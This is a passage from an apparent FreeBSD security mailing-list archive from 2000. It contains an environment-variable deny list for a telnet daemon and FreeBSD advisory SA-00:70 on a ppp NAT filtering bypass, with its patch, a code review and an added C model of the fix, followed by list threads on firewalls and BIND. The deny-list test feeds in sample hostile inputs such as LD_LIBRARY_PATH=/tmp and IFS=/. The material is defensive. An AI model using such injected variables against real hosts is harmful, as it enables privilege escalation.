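 * cannot drift apart when the list is edited.  The entries are the ones the
 * patch adds plus the loader variables filtered just above the hunk (LD_ is
 * assumed from the surrounding code; _RLD_ and LIBPATH= are visible in it).
 * "TERMCAP=/" matches only a file path: an inline termcap entry (no leading
 * slash) is passed through, as in the patch. */
#define PFX(s) { s, sizeof(s) - 1 }
static const struct { const char *prefix; size_t len; } deny[] = {
    PFX("LD_"),            PFX("_RLD_"),        PFX("LIBPATH="),
    PFX("LOCALDOMAIN="),   PFX("RES_OPTIONS="), PFX("TERMINFO="),
    PFX("TERMINFO_DIRS="), PFX("TERMPATH="),    PFX("TERMCAP=/"),
    PFX("ENV="),           PFX("IFS="),
};
#undef PFX

/* Returns 1 if the variable must be dropped, 0 if it may be passed on. */
int env_is_denied(const char *var)
{
    size_t i;

    for (i = 0; i < sizeof(deny) / sizeof(deny[0]); i++)
        if (strncmp(var, deny[i].prefix, deny[i].len) == 0)
            return 1;
    return 0;
}

/* Compacts the NULL-terminated array in place, like the cpp/cpp2 loop in
 * sys_term.c, and returns how many variables survived. */
size_t env_filter(char **envp)
{
    char **cpp, **cpp2;

    for (cpp = cpp2 = envp; *cpp != NULL; cpp++)
        if (!env_is_denied(*cpp))
            *cpp2++ = *cpp;
    *cpp2 = NULL;
    return (size_t)(cpp2 - envp);
}

int main(void)
{
    /* Constructed sample of what a client could send via the telnet
     * environment option. */
    char *env[] = {
        "TERM=vt100",
        "TERMCAP=/dev/random",                  /* file path: dropped */
        "TERMCAP=vt100|dec vt100:co#80:li#24:", /* inline entry: kept */
        "IFS=/",
        "LD_LIBRARY_PATH=/tmp",
        "RES_OPTIONS=debug",
        "HOME=/home/user",
        NULL
    };
    size_t n = env_filter(env), i;

    for (i = 0; i < n; i++)
        printf("kept: %s\n", env[i]);
    return 0;
}
```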
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:70.ppp-nat
Reply-To: security-advisories@freebsd.org
Message-Id: <20001114223203.72E6B37B4D7@hub.freebsd.org>
Date: Tue, 14 Nov 2000 14:32:03 -0800 (PST)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:70                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          ppp "deny_incoming" does not correctly deny incoming packets

Category:       core
Module:         ppp
Announced:      2000-11-14
Credits:        Robin Melville
Affects:        FreeBSD 3.5, 3.5.1, 4.1, 4.1.1
                FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the
                correction date.
Corrected:      2000-10-30 (FreeBSD 4.1.1-STABLE)
                2000-10-30 (FreeBSD 3.5.1-STABLE)
FreeBSD only:   Yes

I.   Background

The ppp(8) utility includes network address translation functionality
for translating between public and private IP address ranges. It uses
the libalias library to perform translation services.

II.  Problem Description

The "nat deny_incoming" command is documented as "refusing all incoming
connections" and is commonly used as a simple "firewall" to prevent
outside users from connecting to services on the internal network.

However the behaviour of the ppp code was changed in the 4.x and 3.x
branches prior to the release of FreeBSD 4.1 and 3.5 (on 2000-06-05 and
2000-06-03 respectively) to allow passing of packets which are not
understood, such as IPSEC packets and other IP protocol traffic not
explicitly recognised by the code as being an "incoming connection
attempt". While this was arguably incorrect behaviour in itself, the
code also incorrectly allowed through ALL incoming traffic, effectively
turning "deny_incoming" into a no-op.
Thus, users who are using the deny_incoming functionality in the
expectation that it provides a "deny by default" firewall which only
allows through packets known to be part of an existing NAT session, are
in fact allowing other types of unsolicited IP traffic into their
internal network.

The behaviour of ppp was corrected to only allow incoming packets which
are known to be part of a valid NAT session, which gives the desired
packet filtering behaviour in the general case. Outgoing IP traffic
which is not understood by libalias (such as an outgoing IPSEC packet
part of a VPN) will cause a NAT session to be established which will
allow incoming packets with the corresponding source and destination IP
addresses and protocol number to pass, but all others to be denied.
This behaviour may be sufficient for the security needs of many users,
although users with advanced filtering or security policy requirements
are advised to use a more configurable packet filter such as those
provided by ipfw(8) or ipf(8) which can meet their needs.

The following released versions of FreeBSD are the only releases
vulnerable to this problem: 3.5, 3.5.1, 4.1, 4.1.1. It was fixed in the
4.1.1-STABLE branch prior to the release of FreeBSD 4.2-RELEASE.

III. Impact

Remote users can cause incoming traffic which is not part of an existing
NAT session to pass the NAT gateway, which may constitute a breach of
security policy.

IV.  Workaround

Use a true packet filter such as ipfw(8) or ipf(8) on the PPP gateway
to deny incoming traffic according to the desired security policy.

V.   Solution

One of the following:

1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or
3.5.1-STABLE after the respective correction dates.

2) Apply the patch below and recompile the relevant files:

Either save this advisory to a file, or download the patch and detached
PGP signature from the following locations, and verify the signature
using your PGP utility.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:70/ppp.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:70/ppp.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/ppp # patch -p < /path/to/patch_or_advisory # make depend && make all install Patch for vulnerable systems: Index: nat_cmd.c =================================================================== RCS file: /mnt/ncvs/src/usr.sbin/ppp/nat_cmd.c,v retrieving revision 1.49 retrieving revision 1.50 diff -u -r1.49 -r1.50 - --- nat_cmd.c 2000/07/11 22:11:31 1.49 +++ nat_cmd.c 2000/10/30 18:02:01 1.50 @@ -421,7 +421,11 @@ break; case PKT_ALIAS_IGNORED: - - if (log_IsKept(LogTCPIP)) { + if (PacketAliasSetMode(0, 0) & PKT_ALIAS_DENY_INCOMING) { + log_Printf(LogTCPIP, "NAT engine denied data:\n"); + m_freem(bp); + bp = NULL; + } else if (log_IsKept(LogTCPIP)) { log_Printf(LogTCPIP, "NAT engine ignored data:\n"); PacketCheck(bundle, MBUF_CTOP(bp), bp->m_len, NULL, NULL, NULL); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOhG88FUuHi5z0oilAQFcaAP8D9gkr5GbGfj0visocGTMzKmhbXCwtgVX B5qwVdDKYSx3sAicK32gsnKdxJYno5D7Vd8ic0/N28DfuR+rw7tyGKPkgZZQiptL CTODBugeHFV/XZ3CyES+orkRN78Wgc6kBZtvyudaXtYHbzRo2K48acOGnQN/X4tR Tt613Vl57rY= =SCKm -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 14:45:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by hub.freebsd.org (Postfix) with ESMTP id B439A37B4CF for ; Tue, 14 Nov 2000 14:45:13 -0800 (PST) Received: by grok.example.net (Postfix, from userid 1000) id 3B12521314D; Tue, 14 Nov 2000 14:45:13 -0800 (PST) Date: Tue, 14 Nov 2000 14:45:13 -0800 
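Review bot: In the nat_cmd.c hunk `PacketAliasSetMode(0, 0)` is used as a getter (a zero mask leaves the mode untouched and the call returns the current flags), which reads at first glance like a reset of the mode; a comment, or a small wrapper named for what it does, would make the intent clear. The deny branch also frees the mbuf and sets `bp = NULL` before falling out of the switch, so the code after the switch must already treat a NULL bp as "packet consumed"; that path is outside the hunk and worth confirming. Finally, the new branch calls log_Printf(LogTCPIP, ...) without the `log_IsKept(LogTCPIP)` guard that the `else if` keeps, which is only correct if log_Printf filters internally; if it does, the guard on the else branch exists to avoid the PacketCheck() cost rather than the print itself.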
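A model of the corrected deny_incoming rule described in section II above, added here as an example (not ppp or libalias code): sessions keyed on source, destination and protocol number, with the pre-fix behaviour kept alongside for comparison; the addresses are constructed.

```c
/*
 * Added example, not ppp/libalias code: a small model of the rule that the
 * corrected ppp applies to packets libalias does not understand (IPSEC and
 * other IP protocols).  An outgoing packet records a session keyed on
 * source, destination and protocol number; with deny_incoming set, an
 * incoming packet passes only if it matches a recorded session with the
 * addresses reversed.  nat_incoming_before() reproduces the 3.5/4.1
 * behaviour from the advisory, where such packets passed regardless.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_SESSIONS    64
#define IPPROTO_ESP_NUM 50   /* IP protocol number of IPSEC ESP */
#define IPPROTO_GRE_NUM 47   /* IP protocol number of GRE */

struct pkt     { uint32_t src, dst;      uint8_t proto; };
struct session { uint32_t local, remote; uint8_t proto; };

static struct session table[MAX_SESSIONS];
static size_t nsessions;

/* Builds a host-order IPv4 address from its dotted-quad parts. */
uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return (uint32_t)a << 24 | (uint32_t)b << 16 | (uint32_t)c << 8 | d;
}

void nat_reset(void) { nsessions = 0; }

static int session_exists(uint32_t local, uint32_t remote, uint8_t proto)
{
    size_t i;

    for (i = 0; i < nsessions; i++)
        if (table[i].local == local && table[i].remote == remote &&
            table[i].proto == proto)
            return 1;
    return 0;
}

/* Outgoing direction: an unrecognised packet still establishes a session. */
void nat_outgoing(const struct pkt *p)
{
    struct session s = { p->src, p->dst, p->proto };

    if (!session_exists(s.local, s.remote, s.proto) && nsessions < MAX_SESSIONS)
        table[nsessions++] = s;
}

/* Vulnerable behaviour: ignored traffic was passed unconditionally, so
 * deny_incoming had no effect on it.  Returns 1 for pass, 0 for drop. */
int nat_incoming_before(const struct pkt *p, int deny_incoming)
{
    (void)p;
    (void)deny_incoming;
    return 1;
}

/* Corrected behaviour: with deny_incoming, pass only a packet whose reversed
 * (dst, src, proto) tuple belongs to an established session. */
int nat_incoming_after(const struct pkt *p, int deny_incoming)
{
    if (!deny_incoming)
        return 1;
    return session_exists(p->dst, p->src, p->proto);
}

int main(void)
{
    /* Constructed addresses from the documentation ranges: the gateway's
     * public address, its VPN peer, and an unrelated outside host. */
    struct pkt out   = { ip4(192, 0, 2, 1),    ip4(198, 51, 100, 7), IPPROTO_ESP_NUM };
    struct pkt reply = { ip4(198, 51, 100, 7), ip4(192, 0, 2, 1),    IPPROTO_ESP_NUM };
    struct pkt stray = { ip4(203, 0, 113, 9),  ip4(192, 0, 2, 1),    IPPROTO_ESP_NUM };
    struct pkt other = { ip4(198, 51, 100, 7), ip4(192, 0, 2, 1),    IPPROTO_GRE_NUM };

    nat_reset();
    nat_outgoing(&out);
    printf("ESP reply from peer:  before=%d after=%d\n",
           nat_incoming_before(&reply, 1), nat_incoming_after(&reply, 1));
    printf("ESP from stray host:  before=%d after=%d\n",
           nat_incoming_before(&stray, 1), nat_incoming_after(&stray, 1));
    printf("GRE from peer:        before=%d after=%d\n",
           nat_incoming_before(&other, 1), nat_incoming_after(&other, 1));
    return 0;
}
```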
From: Steve Reid
To: Nuno Teixeira
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PPP NAT Gateway security
Message-ID: <20001114144513.A888@grok>
In-Reply-To: <00c801c04dc4$12a89220$0200a8c0@n2>

On Mon, Nov 13, 2000 at 10:50:05PM -0000, Nuno Teixeira wrote:
> ppp -background -nat MYISP
> It works OK and I have access to a lot of Internet services.
> My question is: do I need to configure this machine with firewall, so I can
> protect my internal network from the outside net?

You probably don't _need_ a firewall, but it usually is a good idea. In practice NAT provides some protection, but that is not what NAT is intended for so I wouldn't rely on it.

The usual way to do it is with ipfw or ipfilter. "man ipfw" and "man ipf" respectively. Because you're using userland PPP you can also do it via the ppp daemon ("man ppp"). I would recommend using ipfw or ipfilter though, as then you don't have to re-write your filter rules if you ever change to a non-ppp interface. You'll probably find more ipf/ipfw information than ppp filter information, because ipf and ipfw are more widely used. A Google search for "ipfw howto" or "ipf howto" should turn up some nice docs.

Both ipfw and ipf are stateful now, so AFAICS the remaining differences are relatively minor for most people. ipf has been ported to systems other than FreeBSD; ipfw works with ethernet bridging. There may be other differences I'm not aware of - I'm an ipf user myself and haven't used ipfw in years.
From owner-freebsd-security Tue Nov 14 16: 2:50 2000
Message-ID: <001c01c04e97$c69c3c90$0200a8c0@n2>
From: "Nuno Teixeira"
To: "Steve Reid"
References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok>
Subject: Re: PPP NAT Gateway security
Date: Wed, 15 Nov 2000 00:05:28 -0000

Hi,

I've configured a 'client' firewall (in the /etc/rc.firewall) in FreeBSD for the private class C IP numbers of my network. It works ok inside the network but I can't get access to the Internet. I believe that this problem is related to my ISP (PPP analog modem) not giving me a static IP but a dynamic one.

What I'd like to do is something like BlackIce does in Windows OS. Can I do the same work with IPFW?

Thanks very much,

Nuno Teixeira
From owner-freebsd-security Tue Nov 14 16:37:18 2000
Message-Id: <200011141850.eAEIoXY00540@hak.lan.Awfulhak.org>
To: "Nuno Teixeira"
Cc: freebsd-security@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: PPP NAT Gateway security
In-Reply-To: Message from "Nuno Teixeira" of "Mon, 13 Nov 2000 22:50:05 GMT." <00c801c04dc4$12a89220$0200a8c0@n2>
Date: Tue, 14 Nov 2000 18:50:33 +0000
From: Brian Somers

> Hello to all,
>
> Recently I configured a FreeBSD box to act like a gateway for my NT
> workstation computers at my office have access to the Internet. I configured
> it in this way:
>
> ppp -background -nat MYISP
>
> It works OK and I have access to a lot of Internet services.
>
> My question is: do I need to configure this machine with firewall, so I can
> protect my internal network from the outside net?
>
> If I need so, please tell me a good place to start with firewalls for
> FreeBSD.

If you just want to deny incoming connections, you can ``nat deny_incoming yes'' and ``nat target MYADDR'' in your config (although *MAKE SURE* you've got a recent version of ppp - you can get it via http://www.Awfulhak.org/ppp.html - if in doubt, test it from the outside). Read the section on that command in the man page too....

If you wish to be more selective, you need to use either ``set filter'' in ppp or the external ipfw(8) program.

> Thanks very much,
>
> Nuno Teixeira

--
Brian

Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Tue Nov 14 18:43:23 2000
Date: Tue, 14 Nov 2000 18:44:14 -0800
From: Kris Kennaway
To: Brian Somers
Cc: Nuno Teixeira, freebsd-security@FreeBSD.ORG
Subject: Re: PPP NAT Gateway security
Message-ID: <20001114184414.A3878@citusc17.usc.edu>
In-Reply-To: <200011141850.eAEIoXY00540@hak.lan.Awfulhak.org>

On Tue, Nov 14, 2000 at 06:50:33PM +0000, Brian Somers wrote:
> > Hello to all,
> >
> > Recently I configured a FreeBSD box to act like a gateway for my NT
> > workstation computers at my office have access to the Internet. I configured
> > it in this way:
> >
> > ppp -background -nat MYISP
> >
> > It works OK and I have access to a lot of Internet services.
> >
> > My question is: do I need to configure this machine with firewall, so I can
> > protect my internal network from the outside net?
> >
> > If I need so, please tell me a good place to start with firewalls for
> > FreeBSD.
>
> If you just want to deny incoming connections, you can ``nat
> deny_incoming yes'' and ``nat target MYADDR'' in your config
> (although *MAKE SURE* you've got a recent version of ppp - you can
> get it via http://www.Awfulhak.org/ppp.html - if in doubt, test it
> from the outside).

The reason for this is described in security advisory 00:70 released today.
Kris

From owner-freebsd-security Tue Nov 14 21:19:43 2000
Date: Tue, 14 Nov 2000 21:19:34 -0800
From: Steve Reid
To: Nuno Teixeira
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PPP NAT Gateway security
Message-ID: <20001114211934.B888@grok>
In-Reply-To: <001c01c04e97$c69c3c90$0200a8c0@n2>

On Wed, Nov 15, 2000 at 12:05:28AM -0000, Nuno Teixeira wrote:
> I've configured a 'client' firewall (in the /etc/rc.firewall) in FreeBSD for
> a private class C IP numbers of my network. It works ok inside the network
> but I can't get access to the Internet. I believe that this problem is
> related to my ISP (PPP analog modem) doesn't give me a static IP but a
> dynamic one.

This is what I've whipped up for my ipfilter config:

http://sea-to-sky.net/~sreid/ipfinit
A simple little sh script that takes an interface name (fxp0 in my case, tun0 in yours) as an argument and extracts the IP address information from ifconfig, then performs the appropriate substitutions on ipf.cfg and feeds the results to ipf.

http://sea-to-sky.net/~sreid/ipf.cfg
My IP Filter configuration template. Must be processed by ipfinit. Default-deny approach with no special handling for FTP connections (use passive mode).

Feel free to use and/or distribute, just give it a look over first to make sure I'm not on crack. If I am then please tell me.

To use the above, add "options IPFILTER" to your kernel config.

> What I'd like to do is something like BlackIce do in Windows OS. Can I do
> the same work with IPFW?

I'm not familiar with BlackIce. Heck, I'm not really even familiar with Windows anymore. :) But from what I gather you're asking about logging unexpected packets. My ipf config has a "log" directive for anything that is addressed to me but not allowed to pass.
Requires "options IPFILTER_LOG" in the kernel config, and "ipmon /var/log/ipf.log" (or equivalent) running in the background.

From owner-freebsd-security Wed Nov 15 1: 1:31 2000
Date: Wed, 15 Nov 2000 11:59:27 +0300
From: "Timur A. Hakimyanov"
Reply-To: "Timur A. Hakimyanov"
Organization: eterra
Message-ID: <11499.001115@mail.ru>
To: freebsd-security@freebsd.org
Subject: kerberos IV

Hello All,

I am running FreeBSD 4.1.1 RELEASE.

----cut----
Neverland# grep kerb /etc/rc.conf
kerberos_server_enable="YES"
Neverland# ps ax|grep kerb
  104 con- S+     0:00.01 kerberos
Neverland# kinit
FreeBSD Inc. (Neverland)
Kerberos Initialization
Kerberos name: timur
Password:
kinit: Can't send request (send_to_kdc)
Neverland#
----cut----

Is there anybody who knows something about this problem? I'm not subscribed to this mailing list, so pls answer to tr_ghost@mail.ru

--
Best regards,
Timur                          mailto:tr_ghost@mail.ru

From owner-freebsd-security Wed Nov 15 3:29:22 2000
Date: Wed, 15 Nov 2000 06:29:16 -0500 (EST)
From: Matt Heckaman
To: Kris Kennaway
Cc: Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000)
In-Reply-To: <20001114141747.A30689@citusc17.usc.edu>

On Tue, 14 Nov 2000, Kris Kennaway wrote:
...
: The upgrade will be committed shortly, I believe - it only applies to
: 3.x, since 4.x has 8.2.3.

Speaking of that, is there a reason I'm missing for 8.2.3 not being in the ports tree where 8.2.2 is?

: Kris

* Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ *
* GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 *

From owner-freebsd-security Wed Nov 15 6: 2:48 2000
06:01:18 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eAFE1Ij45017; Wed, 15 Nov 2000 06:01:18 -0800 (PST) Message-Id: <200011151401.eAFE1Ij45017@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN44995; Wed Nov 15 06:00:34 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Matt Heckaman Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 06:29:16 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 06:00:33 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message , Matt Heckaman writes:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Tue, 14 Nov 2000, Kris Kennaway wrote:
> ...
> : The upgrade will be committed shortly, I believe - it only applies to
> : 3.x, since 4.x has 8.2.3.
>
> Speaking of that, is there a reason I'm missing for 8.2.3 not being in the
> ports tree where 8.2.2 is?

That's because 8.2.3 is in the base tree.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Wed Nov 15 7:13:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 78CBF37B4D7 for ; Wed, 15 Nov 2000 07:13:29 -0800 (PST) Received: (qmail 93814 invoked by uid 1000); 15 Nov 2000 15:13:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 15:13:28 -0000 Date: Wed, 15 Nov 2000 10:13:27 -0500 (EST)
From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Cy Schubert - ITSD Open Systems Group Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151401.eAFE1Ij45017@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: ... : That's because 8.2.3 is in the base tree. Not for people who are not running 4.x * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6EqgYdMMtMcA1U5ARAnMLAJ4jC79gTH+kOvINprasuOw4meVlKgCfekpg uDQl5UqoB//nm4VeNB/ehiA= =ul+l -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 7:28:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 3606537B4C5; Wed, 15 Nov 2000 07:28:40 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA27156; Wed, 15 Nov 2000 07:28:38 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27154; Wed Nov 15 07:28:36 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFFSU005045; Wed, 15 Nov 2000 07:28:30 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdbT5043; Wed Nov 15 07:28:23 2000 Received: (from uucp@localhost) by cwsys.cwsent.com 
(8.11.1/8.9.1) id eAFFSL152822; Wed, 15 Nov 2000 07:28:21 -0800 (PST) Message-Id: <200011151528.eAFFSL152822@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdR52620; Wed Nov 15 07:27:39 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Matt Heckaman Cc: Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 10:13:27 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 07:27:37 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message , Matt Heckaman writes:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote:
> ...
> : That's because 8.2.3 is in the base tree.
>
> Not for people who are not running 4.x

You must be running an old version of 4.x. Bind 8.2.3-T5B was merged into -stable on Jul 3, 2000 and 8.2.3-T6B was MFCed on Nov 2.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Wed Nov 15 7:58:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from axis.tdd.lt (axis.tdd.lt [193.219.211.5]) by hub.freebsd.org (Postfix) with ESMTP id 9D6E537B4CF for ; Wed, 15 Nov 2000 07:58:11 -0800 (PST) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.1/8.11.1) with ESMTP id eAFFvZP33540; Wed, 15 Nov 2000 17:57:35 +0200 (EET) Date: Wed, 15 Nov 2000 17:57:35 +0200 (EET)
From: Domas Mituzas X-Sender: midom@axis.tdd.lt To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151528.eAFFSL152822@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > Try to read that email again ;-) 8.2.3 in ports should be for guys using 3.x (and even 2.2.x ;-) -- Domas Mituzas Systems administrator DELFI, UAB, Lithuania To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 8:36:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0DFDB37B4C5 for ; Wed, 15 Nov 2000 08:36:36 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id IAA27320; Wed, 15 Nov 2000 08:36:20 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27318; Wed Nov 15 08:36:04 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFGZxW56452; Wed, 15 Nov 2000 08:35:59 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdt56449; Wed Nov 15 08:35:21 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eAFGZLY29373; Wed, 15 Nov 2000 08:35:21 -0800 (PST) Message-Id: <200011151635.eAFGZLY29373@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN29317; Wed Nov 15 08:34:34 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert 
- ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Domas Mituzas Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 17:57:35 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 08:34:34 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message , Domas Mituzas writes:
> > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged
> > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2.
> >
> Try to read that email again ;-) 8.2.3 in ports should be for guys using
> 3.x (and even 2.2.x ;-)

I stand corrected.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Nov 15 9:36:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 95CBC37B4CF for ; Wed, 15 Nov 2000 09:36:48 -0800 (PST) Received: (qmail 94193 invoked by uid 1000); 15 Nov 2000 17:36:47 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 17:36:47 -0000 Date: Wed, 15 Nov 2000 12:36:46 -0500 (EST)
From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Cy Schubert - ITSD Open Systems Group Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151528.eAFFSL152822@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: ... : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. Not quite :) I have two machines on 4.1.1-RELEASE, which are new and were installed as 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm not comfortable doing a make world upgrade on 